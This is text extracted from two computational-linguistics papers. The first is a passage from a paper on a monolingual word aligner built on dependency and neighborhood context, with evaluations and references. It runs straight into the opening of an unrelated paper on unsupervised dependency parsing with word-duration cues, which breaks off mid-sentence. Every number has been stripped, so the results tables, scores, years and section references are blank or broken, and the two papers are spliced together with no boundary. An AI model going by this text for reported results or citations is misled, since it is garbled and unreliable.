scenarios regarding parent- child orientations are shown in figure . if (s,t) ∈ <sim and (rs,rt) ∈ <sim (represented by bidirec- tional arrows), then each orientation represents a set of possible ways in which the s and t dependen- cies (unidirectional arrows) can provide evidence of similarity between the contexts of s in s and t in t . each such set comprises equivalent dependency type pairs for that orientation. in the example of figure , (dobj, rcmod) is such a pair for orientation (c), given s = t = “wrote” and rs = rt = “book”. we apply the notion of dependency type equiva- lence to intra-category alignment of content words in four major lexical categories: verbs, nouns, adjectives and adverbs (the stanford pos tag- ger (toutanova et al., ) is used to identify the categories). table shows dependency type equiva- lences for each lexical category of s and t. the ‘←’ sign on column of some rows repre- sents a duplication of the column content of the s rs t rt rs s rt t s rs t rt s rs t rt (a) (b) (c) (d) figure : parent-child orientations in dependencies same row. for each row, columns and show two sets of dependency types; each member of the first is equivalent to each member of the second for the current orientation (column ) and lexical categories of the associated words (columns and ). for exam- ple, row represents the fact that an agent relation (between s and rs; s is the parent) is equivalent to an nsubj relation (between t and rt; t is the parent). note that the equivalences are fundamentally re- dundant across different orientations. for example, row (which is presented as an instance of ori- entation (a)) can also be presented as an instance of orientation (b) with pos(s)=pos(t)=noun and pos(rs)=pos(rt)=verb. we avoid such redundancy for compactness. for the same reason, the equiva- lence of dobj and rcmod in figure is shown in the table only as an instance of orientation (c) and not as an instance of orientation (d) (in general, this is why orientations (b) and (d) are absent in the table). we present dependency-based contextual evidence extraction in algorithm . (the stanford dependency parser (de marneffe et al., ) is used to extract the dependencies.) given a word pair (si, tj) from the in- put sentences s and t , it collects contextual evidence (as indexes of rsi and rtj with a positive similarity) for each matching row in table . an exact match of the two dependencies is also considered a piece of evidence. note that table only considers con- tent word pairs (si, tj) such that pos(si)=pos(tj), but as % of all content word alignments in the msr alignment dev set are within the same lexical category, this is a reasonable set to start with. . . textual neighborhood while equivalent dependencies can provide strong contextual evidence, they can not ensure high recall because, a) the ability to accurately extract depen- orientation pos(s, t) pos(rs, rt) s dependency types t dependency types s rs t rt verb verb {purpcl, xcomp} ←− noun {agent, nsubj, xsubj} ←− {dobj, nsubjpass, rel} ←− {tmod, prep in, prep at, prep on} ←− {iobj, prep to} ←− noun verb {infmod, partmod, rcmod} ←− (a) noun {pos, nn, prep of, prep in, prep at, prep for} ←− adjective {amod, rcmod} ←− s rs t rt verb verb {conj and} ←− {conj or} ←− {conj nor} ←− noun {dobj, nsubjpass, rel} {infmod, partmod, rcmod} adjective {acomp} {cop, csubj} noun noun {conj and} ←− {conj or} ←− {conj nor} ←− adjective {amod, rcmod} {nsubj} adjective adjective {conj and} ←− {conj or} ←− (c) {conj nor} ←− adverb adverb {conj and} ←− {conj or} ←− {conj nor} ←− table : equivalent dependency structures algorithm : depcontext(s,t,i,j,eq) input: . s, t : sentences to be aligned . i: index of a word in s . j: index of a word in t . eq: dependency type equivalences (table ) output: context = {(k,l)}: pairs of word indexes context ←{(k,l) : wordsim(sk, tl) > ∧ (i,k,τs) ∈ dependencies(s) ∧ (j, l,τt) ∈ dependencies(t) ∧pos(si) = pos(tj) ∧pos(sk) = pos(tl) ∧ (τs = τt ∨ (pos(si),pos(sk),τs,τt) ∈ eq))} dencies is limited by the accuracy of the parser, and b) we investigate equivalence types for only inter- lexical-category alignment in this study. therefore we apply an additional model of word context: the textual neighborhood of s in s and t in t . extraction of contextual evidence for content words from textual neighborhood is described in al- gorithm . like the dependency-based module, it accumulates evidence for each (si, tj) pair by in- specting multiple pairs of neighboring words. but in- stead of aligning only words within a lexical category, algorithm : textcontext(s,t,i,j, stop) input: . s, t : sentences to be aligned . i: index of a word in s . j: index of a word in t . stop: a set of stop words output: context = {(k,l)}: pairs of word indexes ci ←{k : k ∈ [i− , i + ] ∧k = i∧sk ∈ stop} cj ←{l : l ∈ [j − ,j + ] ∧ l = j ∧ tl ∈ stop} context ← ci ×cj this module also performs inter-category alignment, considering content words within a ( , ) window of si and tj as neighbors. we implement relational equivalence (≈) here by holding any two positions within the window equally contributive and mutually comparable as sources of contextual evidence. . the alignment algorithm we now describe each alignment module in the pipeline and their sequence of operation. . . identical word sequences the presence of a common word sequence in s and t is indicative of an (a) identical, and (b) con- textually similar word in the other sentence for each word in the sequence. we observe the results of aligning identical words in such sequences of length n containing at least one content word. this simple heuristic demonstrates a high precision (≈ %) on the msr alignment dev set for n ≥ , and therefore we consider membership in such sequences as the simplest form of contextual evidence in our system and align all identical word sequence pairs in s and t containing at least one content word. from this point on, we will refer to this module as wsalign. . . named entities we align named entities separately to enable the alignment of full and partial mentions (and acronyms) of the same entity. we use the stanford named entity recognizer (finkel et al., ) to identify named entities in s and t . after aligning the exact term matches, any unmatched term of a partial mention is aligned to all terms in the full mention. the mod- ule recognizes only first-letter acronyms and aligns an acronym to all terms in the full mention of the corresponding name. since named entities are instances of nouns, named entity alignment is also informed by contextual ev- idence (which we discuss in the next section), but happens before alignment of other generic content words. parents (or children) of a named entity are simply the parents (or children) of its head word. we will refer to this module as a method named nealign from this point on. . . content words extraction of contextual evidence for promising content word pairs has already been discussed in section . , covering both dependency-based context and textual context. algorithm (cwdepalign) describes the dependency-based alignment process. for each potentially alignable pair (si, tj), the dependency- based context is extracted as described in algorithm , and context similarity is calculated as the sum of the word similarities of the (sk, tl) context word pairs (lines - ). (the wordsim method returns a similarity score in { , ppdbsim, }.) the alignment score of the (si, tj) pair is then a weighted sum of word and contextual similarity (lines - ). (we discuss how the weights are set in section algorithm : cwdepalign(s,t,eq,ae,w, stop) input: . s, t : sentences to be aligned . eq: dependency type equivalences (table ) . ae: already aligned word pair indexes . w: weight of word similarity relative to contex- tual similarity . stop: a set of stop words output: a = {(i,j)}: word index pairs of aligned words {(si, tj)} where si ∈ s and tj ∈ t Ψ ← ∅; ΛΨ ← ∅; Φ ← ∅ for si ∈ s,tj ∈ t do if si ∈ stop ∧¬∃tl : (i, l) ∈ ae ∧ tj ∈ stop ∧¬∃sk : (k,j) ∈ ae ∧wordsim(si, tj) > then context ← depcontext(s,t,i,j,eq) contextsim ← ∑ (k,l)∈context wordsim(sk, tl) if contextsim > then Ψ ← Ψ ∪{(i,j)} ΛΨ(i,j) ← context Φ(i,j) ← w ∗wordsim(si, tj) +( −w) ∗ contextsim linearize and sort Ψ in decreasing order of Φ(i,j) a ← ∅ for (i,j) ∈ Ψ do if ¬∃l : (i, l) ∈ a ∧¬∃k : (k,j) ∈ a then a ← a∪{(i,j)} for (k,l) ∈ ΛΨ(i,j) do if ¬∃q : (k,q) ∈ a∪ae ∧¬∃p : (p,l) ∈ a∪ae then a ← a∪{(k,l)} . . .) the module then aligns (si, tj) pairs with non-zero evidence in decreasing order of this score (lines - ). in addition, it aligns all the pairs that contributed contextual evidence for the (si, tj) alignment (lines - ). note that we implement a one-to-one alignment whereby a word gets aligned at most once within the module. algorithm (cwtextalign) presents alignment based on similarities in the textual neighborhood. for each potentially alignable pair (si, tj), algorithm is used to extract the context, which is a set of neigh- boring content word pairs (lines - ). the contextual similarity is the sum of the similarities of these pairs algorithm : cwtextalign(s,t,ae,w, stop) input: . s, t : sentences to be aligned . ae: existing alignments by word indexes . w: weight of word similarity relative to contex- tual similarity . stop: a set of stop words output: a = {(i,j)}: word index pairs of aligned words {(si, tj)} where si ∈ s and tj ∈ t Ψ ← ∅; Φ ← ∅ for si ∈ s, tj ∈ t do if si ∈ stop ∧¬∃tl : (i, l) ∈ ae ∧ tj ∈ stop ∧¬∃sk : (k,j) ∈ ae ∧wordsim(si, tj) > then Ψ ← Ψ ∪{(i,j)} context ← textcontext(s,t,i,j, stop) contextsim ← ∑ (k,l)∈context wordsim(sk, tl) Φ(i,j) ← w ∗wordsim(si, tj) + ( −w) ∗ contextsim linearize and sort Ψ in decreasing order of Φ(i,j) a ← ∅ for (i,j) ∈ Ψ do if ¬∃l : (i, l) ∈ a ∧¬∃k : (k,j) ∈ a then a ← a∪{(i,j)} (line ), and the alignment score is a weighted sum of word similarity and contextual similarity (lines , ). the alignment score is then used to make one-to-one word alignment decisions (lines - ). considering textual neighbors as weaker sources of evidence, we do not align the neighbors. note that in cwtextalign we also align semanti- cally similar content word pairs (si, tj) with no con- textual similarities if no pairs (sk, tj) or (si, tl) exist with a higher alignment score. this is a consequence of our observation of the msr alignment dev data, where we find that more often than not content words are inherently sufficiently meaningful to be aligned even in the absence of contextual evidence when there are no competing pairs. the content word alignment module is thus itself a pipeline of cwdepalign and cwtextalign. . . stop words we follow the contextual evidence-based approach to align stop words as well, some of which get aligned algorithm : align(s,t,eq,w, stop) input: . s, t : sentences to be aligned . eq: dependency type equivalences (table ) . w: weight of word similarity relative to contex- tual similarity . stop: a set of stop words output: a = {(i,j)}: word index pairs of aligned words {(si, tj)} where si ∈ s and tj ∈ t a ← wsalign(s,t) a ← a∪nealign(s,t,eq,a,w) a ← a∪ cwdepalign(s,t,eq,a,w, stop) a ← a∪ cwtextalign(s,t,a,w, stop) a ← a∪swdepalign(s,t,a,w, stop) a ← a∪swtextalign(s,t,a,w, stop) as part of word sequence alignment as discussed in section . . , and neighbor alignment as discussed in section . . . for the rest we utilize dependen- cies and textual neighborhoods as before, with three adjustments. firstly, since stop word alignment is the last mod- ule in our pipeline, rather than considering all se- mantically similar word pairs for contextual similar- ity, we consider only aligned pairs. secondly, since many stop words (e.g. determiners, modals) typi- cally demonstrate little variation in the dependencies they engage in, we ignore type equivalences for stop words and implement only exact matching of depen- dencies. (stop words in general can participate in equivalent dependencies, but we leave constructing a corresponding mapping for future work.) finally, for textual neighborhood, we separately check align- ments of the left and the right neighbors and aggre- gate the evidences to determine alignment – again due to the primarily syntactic nature of interaction of stop words with their neighbors. thus stop words are also aligned in a sequence of dependency and textual neighborhood-based align- ments. we assume two corresponding modules named swdepalign and swtextalign, respectively. . . the algorithm our full alignment pipeline is shown as the method align in algorithm . note that the strict order of the alignment modules limits the scope of downstream modules since each such module discards any word that has already been aligned by an earlier module (this is accomplished via the variable a; the corre- sponding parameter in algorithms and is ae). the rationales behind the specific order of the mod- ules can now be explained: ( ) wsalign is a module with relatively higher precision, ( ) it is convenient to align named entities before other content words to en- able alignment of entity mentions of different lengths, ( ) dependency-based evidence was observed to be more reliable (i.e. of higher precision) than textual evidence in the msr alignment dev set, and ( ) stop word alignments are dependent on existing content word alignments. the aligner assumes two free parameters: ppdbsim and w (in algorithms and ). to determine their values, we exhaustively search through the two-dimensional space (ppdbsim,w) for ppdbsim,w ∈{ . , ..., . , } and the combina- tion ( . , . ) yields the best f score for the msr alignment dev set. we use these values for the aligner in all of its subsequent applications. evaluation we evaluate the performance of our aligner both in- trinsically and extrinsically on multiple corpora. . intrinsic evaluation the msr alignment dataset (brockett, ) was designed to train and directly evaluate automated aligners. three annotators individually aligned words and phrases in pairs of premise and hypothe- sis sentences from the rte challenge data (divided into dev and test sets, each consisting of sen- tences). the dataset has subsequently been used to assess several top performing aligners (maccartney et al., ; thadani and mckeown, ; yao et al., a; yao et al., b). we use the test set for evaluation in the same manner as these studies: (a) we apply majority rule to select from the three sets of annotations for each sentence and discard three- way disagreements, (b) we evaluate only on the sure links (word pairs that annotators mentioned should certainly be aligned, as opposed to possible links). we test the generalizability of the aligner by eval- uating it, unchanged (i.e. with identical parameter values), on a second alignment corpus: the edin- http://www.cs.biu.ac.il/ nlp/files/rte aligned.zip system p% r% f % e% m sr maccartney et al. ( ) . . . . thadani & mckeown ( ) . . . . yao et al. ( a) . . . . yao et al. ( b) . . . . this work . . . . e d b ++ yao et al. ( a) . . . . yao et al. ( b) . . . . this work . . . . table : results of intrinsic evaluation on two datasets burgh++ (thadani et al., ) corpus. the test set consists of pairs; each pair is aligned by at most two annotators and we adopt the random selection policy described in (thadani et al., ) to resolve disagreements. table shows the results. for each corpus, it shows precision (% alignments that matched with gold annotations), recall (% gold alignments discov- ered by the aligner), f score and the percentage of sentences that received the exact gold alignments (denoted by e) from the aligner. on the msr test set, our aligner shows a . % improvement in f score over the previous best sys- tem (yao et al., a) with a . % error reduction. importantly, it demonstrates a considerable increase in recall without a loss of precision. the e score also increases as a consequence. on the edinburgh++ test set, our system achieves a . % increase in f score (an error reduction of . %) over the previous best system (yao et al., a), with improvements in both precision and recall. this is a remarkable result that demonstrates the general applicability of the aligner, as no parameter tuning took place. . . ablation test we perform a set of ablation tests to assess the importance of the aligner’s individual components. each row of table beginning with (-) shows a fea- ture excluded from the aligner and two associated sets of metrics, showing the performance of the re- sulting algorithm on the two alignment corpora. without a word similarity module, recall drops as would be expected. without contextual evidence (word sequences, dependencies and textual neigh- bors) precision drops considerably and recall also falls. without dependencies, the aligner still gives http://www.ling.ohio-state.edu/∼scott/#edinburgh-plusplus msr edb++ feature p% r% f % p% r% f % original . . . . . . (-) word similarity . . . . . . (-) contextual evidence . . . . . . (-) dependencies . . . . . . (-) text neighborhood . . . . . . (-) stop words . . . . . . table : ablation test results state-of-the-art results, which points to the possibility of a very fast yet high-performance aligner. without evidence from textual neighbors, however, the preci- sion of the aligner suffers badly. textual neighbors find alignments across different lexical categories, a type of alignment that is currently not supported by our dependency equivalences. extending the set of dependency equivalences might alleviate this is- sue. finally, without stop words (i.e. while aligning content words only) recall drops just a little for each corpus, which is expected as content words form the vast majority of non-identical word alignments. . extrinsic evaluation we extrinsically evaluate our system on textual simi- larity identification and paraphrase detection. here we discuss each task and the results of evaluation. . . semantic textual similarity given two short input text fragments (commonly sentences), the goal of this task is to identify the degree to which the two fragments are semantically similar. the *sem sts task (agirre et al., ) assessed a number of sts systems on four test datasets by comparing their output scores to human annotations. pearson correlation coefficient with hu- man annotations was computed individually for each test set and a weighted sum of the correlations was used as the final evaluation metric (the weight for each dataset was proportional to its size). we apply our aligner to the task by aligning each sentence pair and taking the proportion of content words aligned in the two sentences (by normalizing with the harmonic mean of their number of content words) as a proxy of their semantic similarity. only three of the four sts datasets are freely avail- able (headlines, onwn, and fnwn), which we use for our experiments (leaving out the smt dataset). http://ixa .si.ehu.es/sts/ system correl.% rank han et al. ( ) . (original) jacanaalign . this work . table : extrinsic evaluation on sts data these three sets contain annotated sentence pairs in total. table shows the results. the first row shows the performance of the top system in the task. with a direct application of our aligner (no parameter tun- ing), our sts algorithm acheives a . % weighted correlation, which would earn it the th rank among participating systems. considering the fact that alignment is one of many components of sts, this result is truly promising. for comparison, we also evaluate the previous best aligner named jacanaalign (yao et al., a) on sts data (the jacanaalign public release is used, which is a version of the original aligner with extra lexical resources). we apply three different val- ues derived from its output as proxies of semantic similarity: a) aligned content word proportion, b) the viterbi decoding score, and c) the normalized decod- ing score. of the three, (b) gives the best results, which we show in row of table . our aligner outperforms jacanaalign by a large margin. . . paraphrase identification the goal of paraphrase identification is to decide if two sentences have the same meaning. the output is a yes/no decision instead of a real-valued similarity score as in sts. we use the msr paraphrase cor- pus ( dev pairs, test pairs) (dolan et al., ) to evaluate our aligner and compare with other aligners. following earlier work (maccartney et al., ; yao et al., b), we use a normalized align- ment score of the two sentences to make a decision based on a threshold which we set using the dev set. alignments with a higher-than-threshold score are taken to be paraphrases and the rest non-paraphrases. again, this is an oversimplified application of the aligner, even more so than in sts, since a small change in linguistic properties of two sentences (e.g. polarity or modality) can turn them into non- https://code.google.com/p/jacana/ http://research.microsoft.com/en-us/downloads/ d d - cd- e - bc-a f cd / system acc.% p% r% f % madnani et al. ( ) . . . . yao et al. ( a) . . . . yao et al. ( b) . . . . this work . . . . table : extrinsic evaluation on msr paraphrase data paraphrases despite having a high degree of align- ment. so the aligner was not expected to demonstrate state-of-the-art performance, but still it gets close as shown in table . the first column shows the accu- racy of each system in classifying the input sentences into one of two classes: true (paraphrases) and false (non-paraphrases). the rest of the columns show the performance of the system for the true class in terms of precision, recall, and f score. italicized numbers represent scores that were not reported by the authors of the corresponding papers, but have been recon- structed from the reported data (and hence are likely to have small precision errors). the first row shows the best performance by any system on the test set to the best of our knowledge. the next two rows show the performances of two state-of-the-art aligners (performances of both sys- tems were reported in (yao et al., b)). the last row shows the performance of our aligner. al- though it does worse than the best paraphrase system, it outperforms the other aligners. discussion our experiments reveal that a word aligner based on simple measures of lexical and contextual similar- ity can demonstrate state-of-the-art accuracy. how- ever, as alignment is frequently a component of larger tasks, high accuracy alone is not always sufficient. other dimensions of an aligner’s usability include speed, consumption of computing resources, replica- bility, and generalizability to different applications. our design goals include achieving a balance among such multifarious and conflicting goals. a speed advantage of our aligner stems from for- mulating the problem as one-to-one word alignment and thus avoiding an expensive decoding phase. the presence of multiple phases is offset by discarding already aligned words in subsequent phases. the use of ppdb as the only (hashable) word similarity resource helps in reducing latency as well as space requirements. as shown in section . . , further speedup could be achieved with only a small perfor- mance degradation by considering only the textual neighborhood as source of contextual evidence. however, the two major goals that we believe the aligner achieves to the greatest extent are replicabil- ity and generalizability. the easy replicability of the aligner stems from its use of only basic and fre- quently used nlp modules (a lemmatizer, a pos tagger, an ner module, and a dependency parser: all available as part of the stanford corenlp suite ; we use a python wrapper ) and a single word similarity resource (ppdb). we experimentally show that the aligner can be successfully applied to different alignment datasets as well as multiple end tasks. we believe a design characteristic that enhances the generalizability of the aligner is its minimal dependence on the msr alignment training data, which originates from a tex- tual entailment corpus having unique properties such as disparities in the lengths of the input sentences and a directional nature of their relationship (i.e., the premise implying the hypothesis, but not vice versa). a related potential reason is the symmetry of the aligner’s output (caused by its assumption of no directionality) – the fact that it outputs the same set of alignments regardless of the order of the input sentences, in contrast to most existing aligners. major limitations of the aligner include the inabil- ity to align phrases, including multiword expressions. it is incapable of capturing and exploiting long dis- tance dependencies among words (e.g. coreferences). no word similarity resource is perfect and ppdb is no exception, therefore certain word alignments also remain undetected. conclusions we show how contextual evidence can be used to construct a monolingual word aligner with certain de- sired properties, including state-of-the-art accuracy, easy replicability, and high generalizability. some potential avenues for future work include: allow- ing phrase-level alignment via phrasal similarity re- sources (e.g. the phrasal paraphrases of ppdb), in- cluding other sources of similarity such as vector space models or wordnet relations, expanding the set http://nlp.stanford.edu/downloads/corenlp.shtml https://github.com/dasmith/stanford-corenlp-python of dependency equivalences and/or using semantic role equivalences, and formulating our alignment al- gorithm as objective optimization rather than greedy search. the aligner is available for download at https://github.com/ma-sultan/ monolingual-word-aligner. acknowledgments this material is based in part upon work supported by the national science foundation under grant num- bers ehr/ and ehr/ . any opin- ions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the na- tional science foundation. references eneko agirre, daniel cer, mona diab, aitor gonzalez- agirre, and weiwei guo. . *sem shared task: semantic textual similarity. in proceedings of the second joint conference on lexical and compu- tational semantics. association for computational linguistics, - . colin bannard and chris callison-burch. . para- phrasing with bilingual parallel corpora. in proceed- ings of the rd annual meeting on association for computational linguistics. association for computa- tional linguistics, - . daniel bär, chris biemann, iryna gurevych, and torsten zesch. . ukp: computing semantic textual sim- ilarity by combining multiple content similarity mea- sures. in proceedings of the first joint conference on lexical and computational semantics. association for computational linguistics, - . roy bar-haim, ido dagan, bill dolan, lisa ferro, danilo giampiccolo, bernardo magnini, and idan szpektor. . the second pascal recognising textual en- tailment challenge. in proceedings of the second pascal recognising textual entailment challenge. chris brockett. . aligning the rte cor- pus. technical report msr-tr- - , microsoft research. nathanael chambers, daniel cer, trond grenager, david hall, chloe kiddon, bill maccartney, marie-catherine de marneffe, daniel ramage, eric yeh, and christopher d manning. . learning alignments and leverag- ing natural logic. in proceedings of the acl-pascal workshop on textual entailment and paraphrasing as- sociation for computational linguistics, - . ming-wei chang, dan goldwasser, dan roth, and vivek srikumar. . discriminative learning over con- strained latent representations. in proceedings of the annual conference of the north american chap- ter of the association for computational linguistics association for computational linguistics, - . dipanjan das and noah a. smith. . paraphrase iden- tication as probabilistic quasi-synchronous recogni- tion. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp. association for computational linguistics, - . marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the international conference on lan- guage resources and evaluation. - . marie-catherine de marneffe and christopher d. man- ning. . stanford typed dependencies manual. technical report, stanford university. bill dolan, chris quirk, and chris brockett. . un- supervised construction of large paraphrase corpora: exploiting massively parallel news sources. in pro- ceedings of the international conference on compu- tational linguistics. association for computational linguistics, - . jenny rose finkel, trond grenager, and christopher man- ning. . incorporating non-local information into information extraction systems by gibbs sampling. in proceedings of the rd annual meeting of the associ- ation for computational linguistics. association for computational linguistics, - . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in proceedings of the conference of the north american chapter of the association for com- putational linguistics. association for computational linguistics, - . lushan han, abhay kashyap, tim finin, james mayeld, and jonathan weese. . umbc ebiquity-core: semantic textual similarity systems. in proceedings of the second joint conference on lexical and compu- tational semantics, volume . association for compu- tational linguistics, - . andrew hickl and jeremy bensley. . a discourse commitment-based framework for recognizing tex- tual entailment. in proceedings of the acl-pascal workshop on textual entailment and paraphrasing. as- sociation for computational linguistics, - . andrew hickl, jeremy bensley, john williams, kirk roberts, bryan rink, and ying shi. . recog- nizing textual entailment with lccs groundhog system. in proceedings of the second pascal chal- lenges workshop on recognizing textual entailment. milen kouylekov and bernardo magnini. . rec- ognizing textual entailment with tree edit distance al- gorithms. in proceedings of the pascal challenges workshop: recognising textual entailment challenge - . bill maccartney, michel galley, and christopher d. man- ning. . a phrase-based alignment model for nat- ural language inference. in proceedings of the conference on empirical methods in natural language processing. association for computational linguistics, - . nitin madnani, joel tetreault, and martin chodorow. . re-examining machine translation metrics for paraphrase identification. in proceedings of con- ference of the north american chapter of the associ- ation for computational linguistics. association for computational linguistics, - . kapil thadani and kathleen mckeown. . optimal and syntactically-informed decoding for monolingual phrase-based alignment. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies. associa- tion for computational linguistics, - . kapil thadani, scott martin, and michael white. . a joint phrasal and dependency model for paraphrase alignment. in proceedings of coling : posters. - . kristina toutanova, dan klein, christopher d. manning, and yoram singer. feature-rich part-of-speech tagging with a cyclic dependency network in pro- ceedings of the human language technology conference of the north american chapter of the asso- ciation for computational linguistics. association for computational linguistics, - . xuchen yao, benjamin van durme, chris callison-burch, and peter clark. a. a lightweight and high per- formance monolingual word aligner. in proceedings of the st annual meeting of the association for com- putational linguistics. association for computational linguistics, - . xuchen yao, benjamin van durme, chris callison-burch, and peter clark. b. semi-markov phrase-based monolingual alignment. in proceedings of the conference on empirical methods in natural language processing. association for computational linguistics, - . xuchen yao, benjamin van durme, chris callison-burch, and peter clark. c. answer extraction as se- quence tagging with tree edit distance. in proceed- ings of the conference of the north american chapter of the association for computational linguis- tics. association for computational linguistics, - . unsupervised dependency parsing with acoustic cues john k pate (j.k.pate@sms.ed.ac.uk) sharon goldwater (sgwater@inf.ed.ac.uk) school of informatics, university of edinburgh crichton st., edinburgh eh ab, uk abstract unsupervised parsing is a difficult task that infants readily perform. progress has been made on this task using text-based models, but few computational approaches have considered how infants might benefit from acoustic cues. this paper explores the hypothesis that word duration can help with learning syntax. we de- scribe how duration information can be incor- porated into an unsupervised bayesian depen- dency parser whose only other source of infor- mation is the words themselves (without punc- tuation or parts of speech). our results, evalu- ated on both adult-directed and child-directed utterances, show that using word duration can improve parse quality relative to words-only baselines. these results support the idea that acoustic cues provide useful evidence about syntactic structure for language-learning in- fants, and motivate the use of word duration cues in nlp tasks with speech. introduction unsupervised learning of syntax is difficult for nlp systems, yet infants perform this task routinely. pre- vious work in nlp has focused on using the implicit syntactic information available in part-of-speech (pos) tags (klein and manning, ), punctuation (seginer, ; spitkovsky et al., b; ponvert et al., ), and syntactic similarities between related languages (cohen and smith, ; cohen et al., ). however, these approaches likely use the data in a very different way from children: neither pos tags nor punctuation are observed during language acquisition (although see spitkovsky et al. ( a) and christodoulopoulos et al. ( ) for encourag- ing results using unsupervised pos tags), and many children learn in a broadly monolingual environment. this paper explores a possible source of information that nlp systems typically ignore: word duration, or the length of time taken to pronounce each word. there are good reasons to think that word dura- tion might be useful for learning syntax. first, the well-established prosodic bootstrapping hypothesis (gleitman and wanner, ) proposes that infants use acoustic-prosodic cues (such as word duration) to help them identify syntactic structure, because prosodic and syntactic structures sometimes coincide. more recently, we proposed (pate and goldwater, ) that infants might use word duration as a di- rect cue to syntactic structure (i.e., without requir- ing intermediate prosodic structure), because words in high-probability syntactic structures tend to be pronounced more quickly (gahl and garnsey, ; gahl et al., ; tily et al., ). like most recent work on unsupervised parsing, we focus on learning syntactic dependencies. our work is based on headden et al. ( )’s bayesian version of the dependency model with valence (dmv) (klein and manning, ), using interpo- lated backoff techniques to incorporate multiple infor- mation sources per token. however, whereas head- den et al. used words and pos tags as input, we use words and word duration information, presenting three variants of their model that use this information in slightly different ways. by using neither gold-standard nor learned pos tags as input, our work differs from nearly all previous work on unsuper- vised dependency parsing. while learned tags might be plausible to our knowledge, this is the first work to incor- porate acoustic cues into an unsupervised system for learning full syntactic parses. the methods in this paper were inspired by our previous approach (pate and goldwater, ), which showed that word dura- tion measurements could improve the performance of an unsupervised lexicalized syntactic chunker over a words-only baseline. however, that work was lim- ited to hmm-like sequence models, tested on adult- directed speech (ads) only, and none of the models outperformed uniform-branching baselines. here, we extend our results to full dependency parsing, and experiment on transcripts of both spontaneous ads and child-directed speech (cds). our models us- ing word duration outperform words-only baselines, along with the common cover link parser of seginer ( ), and the unsupervised partial parser of pon- vert et al. ( ), unsupervised lexicalized parsers that have obtained state-of-the-art results on standard newswire treebanks (though their performance here is worse, as our input lacks punctuation). we also outperform uniform-branching baselines. syntax and word duration before presenting our models and experiments, we first discuss why word duration might be a useful cue to syntax. this section reviews the two possible rea- sons mentioned above: duration as a cue to prosodic structure, or as a cue to predictability. . prosodic bootstrapping prosody is the structure of speech as conveyed by rhythm and intonation, which are, in turn, conveyed by such measurable phenomena as variation in fun- damental frequency, word duration, and spectral tilt. prosodic structure is typically analyzed as imposing a shallow, hierarchical grouping structure on speech, with the ends of prosodic phrases (constituents) be- ing cued in part by lengthening the last word of the phrase (beckman and pierrehumbert, ). the prosodic bootstrapping hypothesis (gleit- man and wanner, ) points out that prosodic phrases are often also syntactic phrases, and proposes that language-acquiring infants exploit this correla- tion. specifically, if infants can learn about prosodic phrase structure using word duration (and fundamen- in a model of language acquisition, gold tags certainly are not. tal frequency), they may be able to identify syntactic phrases more easily using word strings and prosodic trees than using word strings alone. several behavioral experiments support the con- nection between prosody and syntax and the prosodic bootstrapping hypothesis specifically. for example, there is evidence that adults use prosodic information for syntactic disambiguation (millotte et al., ; price et al., ) and to help in learning the syntax of an artificial language (morgan et al., ), while infants can use acoustic-prosodic cues for utterance- internal clause segmentation (seidl, ). on the computational side, we are aware of only our previous hmm-based chunkers (pate and gold- water, ), which learned shallow syntax from words, words and word durations, or words and hand- annotated prosody. using these chunkers, we found that using words plus prosodic annotation worked better than just words, and words plus word duration worked even better. while these results are consistent with the prosodic bootstrapping hypothesis, we sug- gested that predictability bootstrapping (see below) might be a more plausible explanation. other computational work has combined prosody with syntax, but only in supervised systems, and typi- cally using hand-annotated prosodic information. for example, huang and harper ( ) used annotated prosodic breaks as a kind of punctuation in a su- pervised pcfg, while prosodic breaks learned in a semi-supervised way have been used as features for parse reranking (kahn et al., ) or pcfg state- splitting (dreyer and shafran, ). in contrast to these methods, our approach observes neither parse trees nor prosodic annotations. . predictability bootstrapping on the basis of our hmm chunkers, we introduced the predictability bootstrapping hypothesis (pate and goldwater, ): the idea that word durations could be a useful cue to syntactic structure not (or not only) because they provide information about prosodic structure, but because they are a direct cue to syntac- tic predictability. it is well-established that talkers tend to pronounce words more quickly when they are more predictable, as measured by, e.g., word frequency, n-gram probability, or whether or not the word has been previously mentioned (aylett and turk, ; bell et al., ). however, syntactic proba- you threw it right at the basket figure : example unlabeled dependency parse. bility also seems to matter, with studies showing that verbs tend to be pronounced more quickly when they are in their preferred syntactic frame—transitive vs. intransitive or direct object vs. sentential comple- ment (gahl and garnsey, ; gahl et al., ; tily et al., ). while this syntactic evidence is only for verbs, together with the evidence that effects of other notions of predictability, it suggests that such syntactic effects may also be widespread. if so, the duration of a word could give clues as to whether it is being used in a high-probability or low-probability structure, and thus what the correct structure is. we found that our syntactic chunkers benefited more from duration information than prosodic an- notations, providing some preliminary evidence in favor of predictability bootstrapping, but not ruling out prosodic bootstrapping. so, we are left with two plausible mechanisms by which word duration could help with learning syntax. slow pronunciations may cue the end of a prosodic phrase, which is sometimes also the end of a syntactic phrase. alternatively, slow pronunciations may indicate that the hidden syntactic structure is low probability, facilitating the induc- tion of a probabilistic grammar. this paper will not seek to determine which mechanism is useful, instead taking the presence of two possible mechanisms as encouraging for the prospect of incorporating word duration into unsupervised parsing. models as mentioned, we will be incorporating word dura- tion into unsupervised dependency parsing, produc- ing analyses like the one in figure . each arc is between two words, with the head at the non-arrow end of the arc, and the dependent at the arrow end. one word, the root, depends on no word, and all other words depend on exactly one word. following previous work on unsupervised dependency parsing, we will not label the arcs. the implementation of these models is available at http://github.com/jpate/predictabilityparsing . dependency model with valence all of our models are ultimately based on the de- pendency model with valence (dmv) of klein and manning ( ), a generative, probabilistic model for projective (i.e. no crossing arcs), unlabeled de- pendency parses, such as the one in figure . the dmv generates dependency parses using three probability distributions, which together com- prise model parameters θ. first, the root of the sentence is drawn from proot . second, we decide whether to stop generating dependents of the head h in direction dir ∈ {left, right} with probability pstop(·|h,dir,v), where v is t if h has a dir-ward dependent and f otherwise. if we decide to stop, then h takes no more dependents in the direction of dir. if we don’t stop, we use the third probability distribution pchoose(d|h,dir) to determine which de- pendent d to generate. the second and third step repeat for each generated word until all words have stopped generating in both directions. the dmv was the first unsupervised parsing model to outperform a uniform-branching baseline on the wall street journal corpus. it was trained using em to obtain a maximum-likelihood estimate of the parameters θ, and learned from pos tags to avoid rare events. however, all work on syntactic predictability effects on word duration has been lexi- calized (looking at, e.g., the transitivity bias of par- ticular verbs). in addition, it is unlikely 